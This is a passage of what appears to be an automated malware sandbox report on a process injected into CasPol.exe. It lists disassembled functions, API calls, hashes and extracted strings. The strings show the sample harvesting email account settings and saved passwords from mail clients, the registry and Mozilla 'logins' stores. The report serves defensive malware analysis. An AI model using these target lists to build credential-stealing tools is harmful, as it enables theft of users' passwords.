                                                                                                                                                                                    • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                                                                    Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                                                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                    Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID: (yE$(yE$(yE
                                                                                                                                                                                    • API String ID: 1865533344-362086290
                                                                                                                                                                                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                    Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                    • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                    • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                    • API String ID: 1895597112-3210201812
                                                                                                                                                                                    • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                    • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                    Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                    • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                    • API String ID: 1714764973-479759155
                                                                                                                                                                                    • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                    • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                    Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                    • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                    • API String ID: 3137614212-1455797042
                                                                                                                                                                                    • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                    • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                    Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                    • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                    • API String ID: 2814039832-2206097438
                                                                                                                                                                                    • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                    • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                    Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                                                                                                    • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                    Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                                                                                                    • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                    Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                    • API String ID: 168965057-606283353
                                                                                                                                                                                    • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                    • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                    Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                    • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                    • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                    • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                    • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                    • API String ID: 1428123949-3474136107
                                                                                                                                                                                    • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                    • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                    • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                    Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2998058495-0
                                                                                                                                                                                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                    Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                      • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                    • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
